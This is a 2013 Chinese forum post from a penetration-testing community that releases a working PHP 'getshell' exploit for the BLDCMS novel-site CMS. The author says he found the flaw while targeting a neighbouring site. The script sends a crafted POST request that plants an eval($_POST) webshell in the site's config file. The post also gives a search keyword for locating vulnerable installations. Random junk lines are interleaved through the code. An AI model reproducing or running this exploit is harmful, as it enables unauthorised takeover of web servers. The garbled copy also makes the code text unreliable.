中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
" B# V/ W ]0 n! [& j2 |/ V+ s' W
$ T9 A9 o7 P; l. |3 y
% S" V$ h$ W4 ?
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
. ]4 ~) |" s" f j4 {9 J
) q2 z# F5 [0 A" H$ H
既然都有人发了 我就把我之前写好的EXP放出来吧
+ u# I9 u* p7 L- _7 [
# S# i0 v3 [ Z% E) `
view source print?01.php;">
$ z/ c1 F, g* I3 X2 b2 y
02.<!--?php
/ D! \+ m# z# Q1 s' _: f
03.echo "-------------------------------------------------------------------
& |/ c' Q2 X' H% z- g1 J
04.
( j5 S0 F, e! {
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
% L; m9 U! e6 `& U/ O: s- F
06.
; y9 B. n" R6 W, q
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
: p9 }0 A5 V3 ^1 _- m; r
08.
* b+ p# Y3 [+ n' m
09.QQ:981009941\r\n 2013.3.21\r\n
6 r& Y( u E# ?5 d, M2 s
10.
% v/ N0 s) F8 g- f& l
11.
5 k1 \5 J# `5 B2 }" J* S
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
! z( e% I/ S) G3 \) u1 O( x( L) i( q% A
13.
8 I |2 Y$ G/ K9 A7 A, R' X
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
8 u" v m- l& j1 f0 q
15.
8 W" m5 d3 P1 n% o3 @7 g/ v
16.--------------------------------------------------------------------\r\n";
+ P- N! \* y# n
17.$url=$argv[1];
5 }( s5 X1 _1 ]! Q% d- v: r
18.$dir=$argv[2];
" i2 C* e2 u% W0 F" X4 l9 A5 N
19.$pass=$argv[3];
7 X) D# ~1 Z9 h F, O, h/ X
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
, p3 F# k8 |. V5 {0 s
21.if (emptyempty($pass)||emptyempty($url))
) {" D0 ^$ }+ |' @1 [* J# ]
22.{exit("请输入参数");}
+ b( Z+ g2 ?9 D* i1 {6 j5 ^; [
23.else
! ?5 d1 i7 B7 G4 ?) P* K
24.{
- Y+ J, z! |/ K1 A0 `
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
* f! C3 Y+ y0 H
26.
$ M7 D% L) f8 s8 D7 t2 `5 `
27.al;
, @- Z) `- @) O3 H
28.$length = strlen($fuckdata);
2 s& I1 v# g- F: ~) X, ?- r# U
29.function getshell($url,$pass)
. N- {1 u i; W B- p' L# \ T( y, y
30.{
! A3 ~/ ^' v, \( R9 r8 }
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
' i. ^& w! K2 H1 u
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
" |1 x- N* g1 A+ y
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
: A& y k; Q: N9 R( D$ e; i
34.$header .= "User-Agent: MSIE\r\n";
4 d/ m d3 ?, H3 Z9 L. F$ j8 a
35.$header .= "Host:".$url."\r\n";
! A7 U2 g: s$ ~
36.$header .= "Content-Length: ".$length."\r\n";
/ Q% \1 t2 r+ L
37.$header .= "Connection: Close\r\n";
3 e' t X. }8 {( N
38.$header .="\r\n";
% h4 u3 }$ v! s' e
39.$header .= $fuckdata."\r\n\r\n";
# L" l& S+ y9 ]& s6 e2 g- N$ T2 g$ Q
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
/ u- t6 W# R9 e9 a/ X: `9 Q
41.if (!$fp)
, k7 A% V+ @2 ]9 H: U8 K( ~0 l5 W
42.{
1 G- ?7 _$ k. p5 S+ z6 s% X J
43.exit ("利用失败:请检查指定目标是否能正常打开");
! }( N! M8 F* `
44.}
P! F' {+ z+ j1 U3 e+ P1 q
45.else{ if (!fputs($fp,$header))
1 \; `' t' B. H
46.{exit ("利用失败");}
) H: R: j4 s3 K6 U. O5 t
47.else
+ C1 J) B8 B! o: K6 X' e4 b* ^9 a6 U
48.{
" q @+ X1 B/ r' K0 ^* X h ]/ s
49.$receive = '';
/ W& M9 p5 S% I9 p9 }
50.while (!feof($fp)) {
: \4 `8 s9 r# i( ~- }: G. o
51.$receive .= @fgets($fp, 1000);
9 G9 v/ }: d* r3 ]3 \
52.}
7 C+ _& V: H' x6 o+ R4 N
53.@fclose($fp);
7 s6 R& g5 o, h8 g) c
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
$ U4 x! e+ O& l1 P% v
55.
8 H+ i) q$ P9 P- r
56.GPC是否=off)";
5 i: I6 r# {) @: c& n4 |0 ]% X3 t
57.}}
" y" [8 a" U0 {& a% [4 r7 F
58.}
; }; n* _& D# w' c: s, X2 W; q
59.}
5 B6 _% J3 R U W, z D. @! V
60.getshell($url,$pass);
2 U+ x8 I( a0 c
61.?-->
5 N' M2 C, w- s
9 ]1 M1 {. y$ F7 v* F% v9 T& C# L
! k& t! i3 n- U, j3 v
0 v7 X( A* m% I' p
by 数据流
+ H& T, }& f( M- @" r9 N
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2